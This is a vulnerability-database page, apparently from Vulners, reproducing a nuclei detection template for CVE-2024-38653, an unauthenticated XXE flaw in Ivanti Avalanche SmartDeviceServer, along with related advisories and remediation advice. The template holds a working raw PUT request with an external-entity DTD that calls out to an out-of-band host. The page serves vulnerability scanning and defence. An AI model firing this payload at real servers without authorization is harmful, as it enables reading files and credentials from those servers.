Lucene search
K

Ivanti Avalanche SmartDeviceServer - XML External Entity

🗓️ 02 Jul 2026 09:36:57Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 28 Views

Ivanti Avalanche SmartDeviceServer - XXE allows remote acces

Related
Refs
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for Improper Restriction of XML External Entity Reference in Ivanti Endpoint_Manager
9 May 202403:10
githubexploit
BDU FSTEC
The vulnerability of the SmartDeviceServer component in the Ivanti Avalanche mobile device management system allows a hacker to disclose protected information.
26 Nov 202400:00
bdu_fstec
Circl
CVE-2024-38653
14 Aug 202405:40
circl
CVE
CVE-2024-36136
14 Aug 202402:38
cve
CVE
CVE-2024-38652
14 Aug 202402:38
cve
CVE
CVE-2024-38653
14 Aug 202402:38
cve
Cvelist
CVE-2024-36136
14 Aug 202402:38
cvelist
Cvelist
CVE-2024-38652
14 Aug 202402:38
cvelist
Cvelist
CVE-2024-38653
14 Aug 202402:38
cvelist
EUVD
EUVD-2024-35894
3 Oct 202520:07
euvd
Rows per page
id: CVE-2024-38653

info:
  name: Ivanti Avalanche SmartDeviceServer - XML External Entity
  author: DhiyaneshDK
  severity: high
  description: |
    XXE in SmartDeviceServer in Ivanti Avalanche 6.3.1 allows a remote unauthenticated attacker to read arbitrary files on the server.
  impact: |
    Unauthenticated attackers can read arbitrary files from the Ivanti Avalanche server, potentially exposing configuration files, credentials, and sensitive data managed by the device management system.
  remediation: |
    Upgrade to Ivanti Avalanche version 6.4.0 or later that addresses this XXE vulnerability.
  reference:
    - https://github.com/D4mianWayne/POCs/tree/main/CVE%202024-38653
    - https://github.com/fkie-cad/nvd-json-data-feeds
    - https://nvd.nist.gov/vuln/detail/cve-2024-38653
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-38653
    cwe-id: CWE-611
    epss-score: 0.91984
    epss-percentile: 0.99807
    cpe: cpe:2.3:a:ivanti:avalanche:6.3.1:*:*:*:premise:*:*:*
  metadata:
    max-request: 1
    vendor: ivanti
    product: avalanche
  tags: cve,cve2024,intrusive,ivanti,avalanche,xxe,vkev,vuln

variables:
  filename: "{{to_lower(rand_text_alpha(5))}}"

http:
  - raw:
      - |
        PUT /mdm/checkin HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/xml

        <?xml version="1.0" ?>
        <!DOCTYPE a [
        <!ENTITY % asd SYSTEM "http://{{interactsh-url}}/{{filename}}.dtd">
        %asd;
        %c;
        ]>
        <a></a>

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: word
        part: interactsh_request
        words:
          - "User-Agent: Java"
# digest: 490a00463044022047e090a1d952bbb198c3700112dcda4c6d2b7e4a59e59c4f46ce8580370a120a02205f3526a8f0725ec1b76ef70263a0463eb5ed918052ad7db2c77f249e3fd80de2:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.6High risk
Vulners AI Score7.6
CVSS 3.17.5
CVSS 38.2
EPSS0.91984
SSVC
28